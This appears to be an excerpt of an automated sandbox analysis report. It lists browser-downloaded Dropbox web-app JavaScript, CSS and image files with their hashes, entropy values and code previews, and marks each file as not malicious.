                                                    Preview:define(["exports"],(function(e){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t(e)}function r(e){var r=function(e,r){if("object"!==t(e)||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var o=n.call(e,r||"default");if("object"!==t(o))return o;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===r?String:Number)(e)}(e,"string");return"symbol"===t(r)?r:String(r)}var n="undefined"!=typeof window;e._defineProperty=function(e,t,n){return(t=r(t))in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e},e._toPropertyKey=r,e._typeof=t,e.isBrowser=n,e.noop=function(){},e.off=function(e){for(var t=[],r=1;r<arguments.length;r++)t[r-1]=arguments[r];e&&e.removeEventListener&&e.removeEventListener.apply(e,t)},e.on=function(e){for(v
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (12348)
                                                    Category:dropped
                                                    Size (bytes):12439
                                                    Entropy (8bit):5.171619089569553
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E200EE71BCC85DD6CFF3F50F5B1EEFA2
                                                    SHA1:7ED03395E4F7354686AD6BDB242313931ED3F847
                                                    SHA-256:DA0EF9E5EDFEB22FF0ACE730F9576AC56414EDC879D138D162E2A4477D546ACF
                                                    SHA-512:B0340C7B3A9B876D33EADAC368FAFDDD52D1C9C9C498EBE6DB280E42A6C8628D93FFC0080E95F6A3FA0BBA31B71021B72C7F14A5867A720AD5D330AE126E04A9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./c_photo-editor_plugin_show-edit-plugin","./c_pap-events_previews_create_folder"],(function(e,o,t,i,a){"use strict";const r={modal:{title:t.defineMessage({id:"UK/6DV",defaultMessage:"We.ve made updates!"}),body:t.defineMessage({id:"vWudR3",defaultMessage:"Here are 3 ways to keep work flowing in Dropbox."}),primaryButton:t.defineMessage({id:"kGMStu",defaultMessage:"Show me"}),secondaryButton:t.defineMessage({id:"W9E8bv",defaultMessage:"Skip"})},tooltipEditPdf:{title:t.defineMessage({id:"pryr2f",defaultMessage:"Make edits quickly"}),body:t.defineMessage({id:"ro42fq",defaultMessage:"Reorder pages, highlight text, sign, and more with PDFs."})},tooltipEditImage:{title:t.defineMessage({id:"nU8fzX",defaultMessage:"Make edits quickly"}),body:t.defineMessage({id:"04Z/0K",defaultMessage:"Rotate, flip, crop, adjust brightness, and more with images."})},tooltipEditVideo:{title:t.defineMessage({id:"M5RHHm",defaultMessage
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (40711)
                                                    Category:downloaded
                                                    Size (bytes):40800
                                                    Entropy (8bit):5.384682368017322
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CA2BAA48907EA4E431694BE39EEAA2AD
                                                    SHA1:90C02667178EDF01EEE812DD63C451B58ED0DC3E
                                                    SHA-256:AFFFF96E17FB2FB9D8DF9E14F288B3095856082AD2AC1BE83A52A5E8ACBD02CA
                                                    SHA-512:417793111D0CEDA9A0BE2D99BEA4A153CF0358DA7B4B99994D623E433683D8CF331AC47111AF572AE05C1A836A127AE44FBFDFC734A0262B0F28DE35BBA2AC9B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_title_bar_title_bar_right_section-vflyiuqSJ.js
                                                    Preview:define(["require","exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_dig-illustrations_spot_passcode-lock","./c_extensions_split_share_button_component","./c_file_viewer_title_bar_title_bar_pass_ui","./c_cloud_docs_constants","./c_action_plugins_download_action_button","./c_onboarding_survey_lib_oa_pulsar_campaigns","./c_user_education_user_education_client","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_action_bar_action_bar_strings","./c_lodash","./c_action_plugins_conversion_action_conditions","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_ts_utils","./e_edison","./c_src_sink_index","./c_views_copy_link_mini_modal_after_display_utils","./c_file_viewer_api_navigation","./c_core_data_ui","./c_tagging_data_store","./c_sharing_logger","./c_stormcrow_stormcrow_exposure_logger","./c_react-intl_src_components_message","./c_action_plugins_comment_action_button","./c_react_query_helpers_queries_file_content_metadata","./c_file_vi
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (927)
                                                    Category:downloaded
                                                    Size (bytes):993
                                                    Entropy (8bit):5.140140826422478
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F85EBC835DB67DD12BD057F15CFFB881
                                                    SHA1:A4F5E154FD4A17BA35169CA1C199A91B69DD9978
                                                    SHA-256:95B363761CB023FE7F14EE2BEBFF24B9C960C30DDBE3DE3DD4997D48F0BD8C84
                                                    SHA-512:5BDA8C024DF482A51A9B2EC0B23B99549BB966BD90383EF9F313861FD06E8347D17894E1D68E0ACCF34B69A6A73441BF8FD9C2A45260B881F821BC5E451FEEFE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_spectrum_svg_icon_bundle-vfl-F68g1.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,t,n){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var c=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,c.get?c:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=c(t);function o(e,t){return["mc-icon",`mc-icon-template-${e}`,`mc-icon-template-${e}--${t}`]}const a=({name:e,icon:t,className:c,role:a="img",...l})=>{const s=n.cx(o("stateless",e),c);return r.cloneElement(t,{className:s,role:a,...l})};a.displayName="IconTemplateStateless";let l=0;e.Component=a,e.SvgIconBundle=function({icon:e,...t}){const{attrs:n,dangerouslySetInnerIconHtml:c}=e,o=++l;return r.createElement("svg",{dangerouslySetInnerHTML:{__html:c.replace(/mc-content-/g,o+"-mc-content-")},...n,...t})},e.getClassNamesForName=o}));.//# sourceMappingURL=c_spectrum_svg_icon_bundle.js-vflNZuuxS.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3865)
                                                    Category:dropped
                                                    Size (bytes):3919
                                                    Entropy (8bit):4.942508788104983
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:00CC362895EDDCB644DF3AB5AB3CB6B7
                                                    SHA1:E83858DE969E1895E16786B8B4CD6DB93E3D2A1E
                                                    SHA-256:CDE242662D4411A2B4D31C99C61FB4C764179FFC13F5A089EAE2B1D52BC6E026
                                                    SHA-512:FFB65F24FD826AC4C315D2F2405B64B764421C3569AADDD07BF68E61B382AFCCDF470116ADEFE69727041E124F25767F61A640C7DBB9685BC3C0433B490B7F35
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_react-redux_hooks_useDispatch","react","./c_core_i18n"],(function(e,i,t,r,o){"use strict";function l(e){const t=i.filterZoomableFilePreviewUi(e);if(null==t)return null;return{scaleFactor:i.getScaleFactorFromFilePreviewUi(t)}}const n=e=>{const i=e&&l(e);if(null!=i)return{fitScaleFactor:i.scaleFactor}};function u(e,i){var t;return null===(t=s(e,i))||void 0===t?void 0:t.activeEditPluginId}function s(e,i){return e.plugins[i]}function c(e,i){var t;return null===(t=s(e,i))||void 0===t?void 0:t.editPluginActivationParams}function d(e,i){var t,r;return null===(r=null===(t=s(e,i))||void 0===t?void 0:t.sidebarPlugins)||void 0===r?void 0:r.left}function a(e,i){var t,r;return null===(r=null===(t=s(e,i))||void 0===t?void 0:t.sidebarPlugins)||void 0===r?void 0:r.right}function w(e,i){var t;return null===(t=s(e,i))||void 0===t?void 0:t.activeTextHighlighterPluginId}e.getPluginActivationParams=c,e.getRootImageUi=n,e.getSelectedEditPluginI
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1252)
                                                    Category:dropped
                                                    Size (bytes):1318
                                                    Entropy (8bit):5.1243359376868
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E7BBD4831235770AF7E174B6D96C3501
                                                    SHA1:B2661FD7398717A4B1BF72CAFA80B01B0B4256F8
                                                    SHA-256:3A299343ED6A7390DCE374FADD9A17708EFDBFE1709C459A06AB43FA7890AB57
                                                    SHA-512:9FF2937C8AB871F4BBFC0B0908E15ADBA2BC42172EC514BF9CECA98BDE3BDDC7D14ED0C5A3CBB8A3053C434BB11233283FD5ECD7D94823588F21A04760E5462E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./c_core_notify","./c_ts_utils","./c_security_csrf_hmac","./c_integrations_hellosign_deep_integration_constants","react-dom","react","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_lodash","./c_security_crypto"],(function(e,t,o,s,n,i,r,c,a,_,u,f,d,l){"use strict";const y="toast";async function m(e,t){const o=await n.readHmacCookieToken(e,t);if(null==o)return null;if(o.startsWith("er:"))return[!0,o.substring(3)];if(o.startsWith("ok:"))return[!1,o.substring(3)];throw new Error("unrecognized format of message in toast cookie")}t.decodeToastCookie=m,t.showToastFromCookie=async function(){var t;const n=s.Cookies.read(y);if(n){const r=await m(n,null!==(t=i.readCsrfToken())&&void 0!==t?t:void 0);if(null!=r){const t=o.require_css("/static/metaserver/static/css/notify-vfl4oJv2S.css"),[n,i]=r,{default:c}=await new Promise((function(t,o){e(["./c_core_notify"],t,o)})).then((function
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (11143)
                                                    Category:dropped
                                                    Size (bytes):11201
                                                    Entropy (8bit):5.226504424801209
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:27CC19274E12011B115675480BF934C5
                                                    SHA1:436706556D10585F3346397686ABB29D35C7EA39
                                                    SHA-256:0FF795CC65D502C7D603F6F396154B90D103406B0572C96D5E25F73C6572984E
                                                    SHA-512:CA726D427CF37BEAA83C7DFDC68CF39933F8A8C1FE086A03291FA557E87C8C6D5D4A4AE0342E64AE0F4D106E498ED2B2C78C3B2B20CEEA0508AE31AD1F913CB7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,l,t){"use strict";function r(e){return e&&e.__esModule?e:{default:e}}var n=r(l);const d={backup:function({height:e,width:l,backgroundFill:t,...r}){return n.default.createElement("svg",{width:l,height:e,viewBox:"0 0 301 300",fill:"none",xmlns:"http://www.w3.org/2000/svg",...r},n.default.createElement("path",{d:"M150.858 0C54.1365 0 0.858398 53.2688 0.858398 150C0.858398 246.731 54.1365 300 150.858 300C247.58 300 300.858 246.731 300.858 150C300.858 53.2688 247.58 0 150.858 0Z",fill:t}),n.default.createElement("path",{d:"M73.6418 93.6177H228.075V107.743L239.375 107.743V82.3177H62.3418V174.13C62.3418 185.832 71.8278 195.318 83.5293 195.318H145.208V215.917H116.958V227.217H184.758V215.917H156.508V195.318H218.188C229.889 195.318 239.375 185.832 239.375 174.13V147.275L251.979 159.879L259.969 151.888L233.773 125.692L207.576 151.888L215.566 159.879L228.075 147.37V174.13C228.075 179.591 223.648 184.018 218.188 184.018
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (783)
                                                    Category:downloaded
                                                    Size (bytes):843
                                                    Entropy (8bit):5.091434550413546
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7B54AF25B774FD09740585A4AC30DE10
                                                    SHA1:B898C73A08F5322EFD578F4C373CDC25210B3159
                                                    SHA-256:C69C94752268F1F318FAB476F0C010E07BDD384D6F21D82A3B639C3FDB60AF6C
                                                    SHA-512:098EF9BA332D76DDFC52D422083A4DB8A7AD58F9A066275FBFE123EE827D55975ABB90C192C08FE929E8150180D8748F681CA5B4E883F78832E0238EE5BAFFCC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_security_csrf_hmac-vfle1SvJb.js
                                                    Preview:define(["exports","./c_security_crypto","./c_integrations_hellosign_deep_integration_constants","./c_api_v2_routes_folders_info_provider"],(function(n,e,t,o){"use strict";n.csrfHmacUrltoken=async function(n){const o=n,r=e.stringToBytes(o),s=t.readCsrfToken();if(""===s||null===s)throw new Error("Missing CSRF token");const c=e.stringToBytes(s),i=await e.hmacMessage(c,r);return btoa(e.bytesToString(i))},n.readHmacCookieToken=async function(n,o){const r=n.split(":");if(3!==r.length)return null;const[s,c,i]=r;if("1"!==s)return null;const a=(new TextEncoder).encode(c);let l=decodeURIComponent(i);try{l=atob(l)}catch{return null}const u=e.stringToBytes(l),d=(new TextEncoder).encode(null!=o?o:t.readCsrfToken());return await e.verifyMessageHmac(d,a,u)?decodeURIComponent(c):null}}));.//# sourceMappingURL=c_security_csrf_hmac.js-vflcFU4p0.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 64 x 64, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):2102
                                                    Entropy (8bit):7.84129073007209
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D6559538147BCB481C64FFBBD109EB9B
                                                    SHA1:7FD94B5B2BA45EACDEDFB96783EC5D51EA335638
                                                    SHA-256:CDEC8E10FEBD715F30C9FF9BF653C7B665D5EEEF68EEAA9764AFBA86DC0CBEC6
                                                    SHA-512:13F8B948075A6C807D999A678FA585430B940C8451E86174C280B8CA73FB2A4EC3F38A8C877ADC6CCEA603BA076586F74412FA491A26093903A1C44F8460F17C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR...@...@.....%......IDATx..ZMo.I.~?...g:N23Iv7.z....KB"......@Z....pA.8p...._.@....E.....!a.k;1.3.....P.0.=.{.^'R....z.~...U..CQ...$........O...W.;..&..K.O7.Q.i..K:.j.......8MSD<8d.X.9xQ&.._...W..7....g._......l...J7fVUP.....Nd...Y...\.....w.w....U...k.....L...b.v.,...}............?.......i.a.(K....+W......1.U...&p"..y.QkXA.(!2.|>...<..!.........mm...y./.Z....6...h......<Z @.f.,...I$~.M..h.w...p..Y..Q..EQ.i.+...+......y...~......c....h4J.d8.6o.@..@.e".0!X..w.1.,._.....I.M..&....[[[..JAo.y..=........=z..vo.....,...^.w8.Ea4.....8....$I2..@...4"""...o.{OD...EQDQ..[.x.Y..p8<v. ....#.n.{.<....6/=....gf....s3.vi..&....(.@.....8J.....l'I...{...F....9g.e.eY2.x.I.,.9M........K..(1......4..*K. f.P.U ".Zk.....!..>.HD.....I..m2..z.c.P]............j....L.+(.......37m..9.hh!.U.....a~.L.A.C..f.G.3...D...G.._.&...&...7....\__...VUf..(..Y8bf"....1,".F..n..7n.e.f..b,..`.....0SD...nWU.1..j..GDt.!b..q..c....X...l{{;M.....N'.."..2s0..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2064)
                                                    Category:downloaded
                                                    Size (bytes):2121
                                                    Entropy (8bit):5.251525274298877
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D53E9C54A431C8A209825418731F1F7F
                                                    SHA1:C5CA8E2B8BAD9D857C54F0D0F58B1756C7602D83
                                                    SHA-256:4239A77AB2BA5AEED27C10C947760D3B2C18C51CFEE3294B0DFB544184094237
                                                    SHA-512:C724F75873FC5950CC288367182AB3ACDB1038B3E0DDAD6CFC357FCE588711833650BB969BB5E718CD89BD4DDDB5A5377E4353AC50578EFC7EDA5346226E5137
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_security_crypto-vfl1T6cVK.js
                                                    Preview:define(["require","exports","./c_pap-events_docsend_view_docsend_hub_entry_button"],(function(e,t,n){"use strict";function r(e){return String.fromCharCode(...new Uint8Array(e))}function a(e){const t=new Uint8Array(e.length);for(let n=0;n<e.length;n++)t[n]=e.charCodeAt(n);return t}async function i(){const t=n.edge&&!n.edgeChromium();if(void 0!==window.crypto.subtle&&!t&&!n.checkBrowserVersion(n.chrome,40,!1))return window.crypto;if(t){const{legacyEdgeWrapper:t}=await new Promise((function(t,n){e(["./c_security_legacy_edge_shim"],t,n)})),n=t();if(void 0!==n)return n}throw function(e){const t=new Error(e);return t.isBrowserNotSupported=!0,t}("WebCrypto not supported")}t.b64urldecode=function(e){return a(atob(e.replace(/_/g,"/").replace(/-/g,"+")))},t.b64urlencode=function(e){return function(e){return btoa(e).replace(/\//g,"_").replace(/\+/g,"-")}(r(e))},t.bytesToString=r,t.encryptWithPublicKey=async function(e,t,n){return i().then((async r=>{const a=r.getRandomValues(new Uint8Array(12)),i
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (24308)
                                                    Category:dropped
                                                    Size (bytes):24379
                                                    Entropy (8bit):5.218880259877958
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A1DD3B178A4307DA9081B84B5176C141
                                                    SHA1:BBDAD0C91028C9E071B7C45BC068755C357473D5
                                                    SHA-256:7FDFB54D1BF998ACE1DF8341EC07655EC0CE53943C6C4B7433E1750CC792757F
                                                    SHA-512:701C3971729E75518699E352C37BD5C9945FE2E70FA090BC8B91DE7865377C21271470A1747C2D332966E3B121BA346A9F2890BFE582A7B2479E954C2D909628
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_react-use_misc_util"],(function(t,e){"use strict";function r(t){for(var e=arguments.length,r=Array(e>1?e-1:0),n=1;n<e;n++)r[n-1]=arguments[n];throw Error("[Immer] minified error nr: "+t+(r.length?" "+r.map((function(t){return"'"+t+"'"})).join(","):"")+". Find the full error at: https://bit.ly/3cXEKWf")}function n(t){return!!t&&!!t[U]}function o(t){var e;return!!t&&(function(t){if(!t||"object"!=typeof t)return!1;var e=Object.getPrototypeOf(t);if(null===e)return!0;var r=Object.hasOwnProperty.call(e,"constructor")&&e.constructor;return r===Object||"function"==typeof r&&Function.toString.call(r)===V}(t)||Array.isArray(t)||!!t[L]||!!(null===(e=t.constructor)||void 0===e?void 0:e[L])||l(t)||s(t))}function i(t,e,r){void 0===r&&(r=!1),0===u(t)?(r?Object.keys:X)(t).forEach((function(n){r&&"symbol"==typeof n||e(n,t[n],t)})):t.forEach((function(r,n){return e(n,r,t)}))}function u(t){var e=t[U];return e?e.i>3?e.i-4:e.i:Array.isArray(t)?1:l(t)?2:s(t)?3:0}function c(t,e){return
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (32132)
                                                    Category:dropped
                                                    Size (bytes):32214
                                                    Entropy (8bit):5.352485061731187
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7F973717CA1D0EA08FBBD0D0C714642F
                                                    SHA1:C5E3132F31A6F9FAF892B889EFFFE65E07CA8D86
                                                    SHA-256:135EC3FD600E501D16EF384C742E91B00A45E42C40CD87D3F7B7D6BF69808D1E
                                                    SHA-512:8535873E95BF103BBE6F0E7461D3645FC06953DBCF765C0A554F7743DF1C117CD52E82F3575870D660653624D63C949C4754C721EDDA23A8C324559703DCE2D8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_pap-events_sign_save_signature_doc","./e_file_viewer_static_scl_page_folder","./c_core_notify","./c_core_i18n","react","react-dom","./c_common_inputs_checkbox","./c_atoms_dwg-box_index","./c_react-transition-group_CSSTransition","./c_api_v2_routes_folders_info_provider","./c_ungated_idx_db_access_lib","./c_ts_utils"],(function(e,t,n,i,s,o,a,r,l,g,d,c,h,u){"use strict";function S(e){return e&&e.__esModule?e:{default:e}}var p,_=S(a),E=S(r);e.SignupEndpoints=void 0,(p=e.SignupEndpoints||(e.SignupEndpoints={})).TEAM_REGISTER="/team/join/register",p.MIGRATING_TEAM_REGISTER="/team/join/new_personal",p.THIRD_PARTY_SIGNUP="/ajax_thirdparty_register",p.PAIR_ACCOUNT="/team/join/new_pair_ajax";async function m(e,t){let n=0;for(i.UDCL.logStart("ungated_store_susi_save_file",{tags:{state:"start",store:(null==e?void 0:e.store)||"undefined"}}),e.onUploadStart&&e.onUploadStart();n<3;)try{let n=e.sessionId;if(e.store&&(n=awai
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (5002)
                                                    Category:downloaded
                                                    Size (bytes):5075
                                                    Entropy (8bit):5.434734730311663
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F8798DC51F2BF80FDC174B09B67A2FBD
                                                    SHA1:0A9606BB7FFBEEB775A383C498CACBC30DDA4E6D
                                                    SHA-256:B7D45EA9BF1D6CBE8B078F25D77D5996589EDE05DDDF6ED38B5013AFCC50F0D6
                                                    SHA-512:E2FD92B9FA62F2CF3F3B3C596084415ED625783F7337896D7D78517488ADE85FCE6D85C935475DFCEF0F6092FE9C75F2E94C8DC5E523F54DC95C9961813CDD5D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_action_bar_action_bar_strings-vfl-HmNxR.js
                                                    Preview:define(["exports","./c_core_i18n"],(function(e,s){"use strict";const a=s.defineMessage({id:"3xAi9D",defaultMessage:"Download"}),d=s.defineMessage({id:"BFkYUA",defaultMessage:"Disabled for this file"}),I=s.defineMessage({id:"Wakc3q",defaultMessage:"Copy to Dropbox"}),i=s.defineMessage({id:"A9yx17",defaultMessage:"You do not have permission to save a copy of this file"}),T=s.defineMessage({id:"MysX8v",defaultMessage:"Open in"}),_=s.defineMessage({id:"GtD4wV",defaultMessage:"Move"}),N=s.defineMessage({id:"DyrBQI",defaultMessage:"Rename"}),f=s.defineMessage({id:"nOBhEP",defaultMessage:"Delete"}),M=s.defineMessage({id:"6MJeaA",defaultMessage:"Copy"}),S=s.defineMessage({id:"T/KgJj",defaultMessage:"Version history"}),g=s.defineMessage({id:"GQqYaL",defaultMessage:"Restore"}),t=s.defineMessage({id:"0BUrj7",defaultMessage:"Star"}),n=s.defineMessage({id:"5e94v2",defaultMessage:"Unstar"}),O=s.defineMessage({id:"Wi4w+P",defaultMessage:"Share"}),R=s.defineMessage({id:"Yof/lp",defaultMessage:"Share f
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (64108)
                                                    Category:downloaded
                                                    Size (bytes):64185
                                                    Entropy (8bit):3.7461822590897587
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5F45F4DFA142D82346CBD05E4A03633D
                                                    SHA1:0A542C6D74FADC62BDD89D01C2734B48DEE8B579
                                                    SHA-256:965048B33CC7EE1ECF0359C340A839A13AE469349F574B01CD39B4C331451149
                                                    SHA-512:8392B2B8E8942B199BD41398654F99F34969698312D5434EB004E8C034AECFCD6153D68617FBA8D59A6B697EC58D0598D7EE522E1DBBE6C890628067E2B9A763
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_preview_tour_mini_modal-vflX0X036.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(c,m,e){"use strict";function Z(c){if(c&&c.__esModule)return c;var m=Object.create(null);return c&&Object.keys(c).forEach((function(e){if("default"!==e){var Z=Object.getOwnPropertyDescriptor(c,e);Object.defineProperty(m,e,Z.get?Z:{enumerable:!0,get:function(){return c[e]}})}})),m.default=c,Object.freeze(m)}var a=Z(m);e.injectInternalStyle("/static/metaserver/static/js/file_viewer/preview_tour/mini_modal.module.out-vfl2TSPP2.css",(c=>"._mini-modal-container_1soaa_1{bottom:0;padding:var(--dig-spacing__macro__medium);position:absolute;right:0;z-index:501}._mini-modal-inner-container_1soaa_9{background-color:var(--dig-color__background__raised);box-shadow:var(--boxshadow__elevation2);padding:var(--dig-spacing__macro__small)}._top-section_1soaa_15{display:flex;flex-direction:column;gap:var(--dig-spacing__micro__small);max-width:224px}._thumbnail_1soaa_22{align-self:center;display:flex;margin-bottom:-30px;margin-top
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65156)
                                                    Category:downloaded
                                                    Size (bytes):174744
                                                    Entropy (8bit):4.906708289768462
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5597CA99AC34740BA4045D15C20A82DD
                                                    SHA1:DB2FE867F823BE602476345DB2FC15CE8F9CA780
                                                    SHA-256:5EFFF05B04EFFC2E94BD430F7D46CC859F6FC6DF4B6C209F0532E34903BC8013
                                                    SHA-512:7FF11816C09730E4B33AA93DA49B29F6326EEFE39DFD8EA7F1A9F56CD995E994C4A52ED06F5E418D56E4CD399D3925C32EB2ADE3E14F3A9E8CE3ABD125F326CA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/foundations-components-vflVZfKma.css
                                                    Preview:/** @generated -- This file is automatically synced from @dropbox/dig-foundations@3.4.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/..._ekabin0_3-4-0{color-scheme:var(--dig-color-scheme,light dark)}._ekabin1_3-4-0{color-scheme:light}._ekabin2_3-4-0{color-scheme:dark}._ekabin3_3-4-0{color-scheme:normal}._ekabin4_3-4-0{-webkit-appearance:none;-moz-appearance:none;appearance:none}._ekabin5_3-4-0{-webkit-user-select:none;-moz-user-select:none;user-select:none}._ekabin6_3-4-0{list-style-type:none}._ekabin7_3-4-0{cursor:default}._ekabin8_3-4-0{cursor:pointer}._ekabin9_3-4-0{word-break:break-all}._ekabina_3-4-0{word-break:break-word}._ekabinb_3-4-0{word-break:inherit}._ekabinc_3-4-0{word-break:keep-all}._ekabind_3-4-0{white-space:normal}._ekabine_3-4-
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10019)
                                                    Category:downloaded
                                                    Size (bytes):10097
                                                    Entropy (8bit):4.238967010622951
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6ADA6ED05041081DF82992BB5AEA5337
                                                    SHA1:ADE4C988651F408361C41884F52D1A1DCF4A3035
                                                    SHA-256:A0444FCCA25EB8A2913030029339DA7F1358159EFA39E3AC508D704810508D58
                                                    SHA-512:B8BC35B82D7FF5BB24123CB0C9748CB631B1222B5E46D1C2C2A8C8524142F9116CB6087BC1E115A82E902BFC5D0A6BB5E3D4463A55B947D450E2D0370DC17551
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-illustrations_spot_passcode-lock-vflatpu0F.js
                                                    Preview:define(["exports","react"],(function(e,c){"use strict";function t(e){if(e&&e.__esModule)return e;var c=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(c,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})}})),c.default=e,Object.freeze(c)}var n=t(c);const r=n.default.createContext(null);r.displayName="PluginMigrationContext";const l=r.Provider;var i=Object.freeze({__proto__:null,PasscodeLockSpot:({altText:e,inverse:c,...t})=>{const r="dig-Illustration dig-Illustration-spot"+(c?" dig-Illustration--inverse":"");return n.createElement("svg",{role:"presentation",...t,className:r,viewBox:"0 0 500 500",fill:"none",xmlns:"http://www.w3.org/2000/svg"},n.createElement("title",null,e),n.createElement("g",{fillRule:"evenodd",clipRule:"evenodd"},n.createElement("path",{d:"M352.6.27c-10.9.7-25.8 9.3-35.7 18.1-13.5 11.3-3.7 4.7-16.3 21.4-9.6 14-20.6 29.5-25.6 39.8-5.5-3.4-11.8-4.7-17.2-4.5-6 1.8-4.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8209)
                                                    Category:dropped
                                                    Size (bytes):8276
                                                    Entropy (8bit):5.353700777112071
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B1CC17586630346C74EC9CA328720C87
                                                    SHA1:1C5E6C170FB21F93E765AFEA665E2AAF0F0745BD
                                                    SHA-256:50D859824F3CB8FE610087896637F2D0D71E54E155DDCBF2A970629DA590F02A
                                                    SHA-512:1B49BAAD2BF347122911626C228DBFC46FDC42633D37FEBAF11721B78AF09EA63A117FFB8A71A959E548EF533F7D13124971421198AF9FDFCADA11F2E13C5E2B
                                                    Malicious:false
                                                    Reputation:unknown
